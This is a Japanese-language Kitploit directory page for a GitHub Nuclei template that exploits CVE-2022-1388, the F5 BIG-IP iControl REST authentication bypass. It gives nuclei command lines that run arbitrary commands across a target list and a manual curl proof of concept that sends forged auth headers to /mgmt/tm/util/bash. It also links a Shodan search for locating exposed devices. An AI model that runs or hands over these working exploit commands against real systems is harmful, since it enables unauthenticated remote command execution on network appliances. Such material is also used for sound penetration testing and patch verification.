Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter — CVE-2022-1388 は、BIG-IP の iControl API の REST コンポーネントにおける認証バイパスの脆弱性であり、CVSSv3 スコア 9.8 が割り当てられています。iControl REST API は、BIG-IP デバイスの管理および設定に使用されます。CVE-2022-1388 は、管理ポートまたは BIG-IP を使用するデバイスの自己 IP アドレスへのネットワークアクセスを持つ未認証の攻撃者によって悪用される可能性があります。悪用されると、攻撃者は任意のシステムコマンドの実行、ファイルの作成および削除、サービスの無効化を行うことができます。 | Kitploit
ツール/GitHubGitHub/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubmrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →

概要

CVE-2022-1388 は、BIG-IP の iControl API の REST コンポーネントにおける認証バイパスの脆弱性であり、CVSSv3 スコア 9.8 が割り当てられています。iControl REST API は、BIG-IP デバイスの管理および設定に使用されます。CVE-2022-1388 は、管理ポートまたは BIG-IP を使用するデバイスの自己 IP アドレスへのネットワークアクセスを持つ未認証の攻撃者によって悪用される可能性があります。悪用されると、攻撃者は任意のシステムコマンドの実行、ファイルの作成および削除、サービスの無効化を行うことができます。

共有
リポジトリを見る
64年前未レビュー

Nucleiテンプレート Exploit F5 BIG-IP iControl REST Auth Bypass RCE | コマンドパラメータ

CVE-2022-1388 は、BIG-IP の iControl API の REST コンポーネントにおける認証バイパスの脆弱性であり、CVSSv3 スコア 9.8 が割り当てられています。iControl REST API は、BIG-IP デバイスの管理と設定に使用されます。CVE-2022-1388 は、BIG-IP を使用するデバイスの管理ポートまたはセルフ IP アドレスへのネットワークアクセスを持つ認証されていない攻撃者によって悪用される可能性があります。悪用されると、攻撃者は任意のシステムコマンドを実行し、ファイルを作成・削除し、サービスを無効にすることができます。

このテンプレートは token-spray / nuclei の CLI 変数を使用します

この nuclei テンプレートは、エクスプロイトのためのシェルパラメータを受け入れます。別のワークフローや手動検索で取得したトークンをテストしたかったため、nuclei の CLI 変数機能を使用して、実行時に単一のトークン値またはトークンのリストをこれらのテンプレートに動的に供給しました。

-V, -var value custom vars in var=value format

root@kitploit:~
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

Captura de tela de 2022-05-10 01-28-12

POC 手動

root@kitploit:~
curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

追加詳細

  • https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

参考文献

  • https://blog.projectdiscovery.io/nuclei-v2-5-release/
  • https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
  • https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
  • https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
  • https://github.com/tenable/audit_files/tree/master/cve-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
  • https://twitter.com/1ZRR4H/status/1522165718975922178
  • https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip
ツールをダウンロード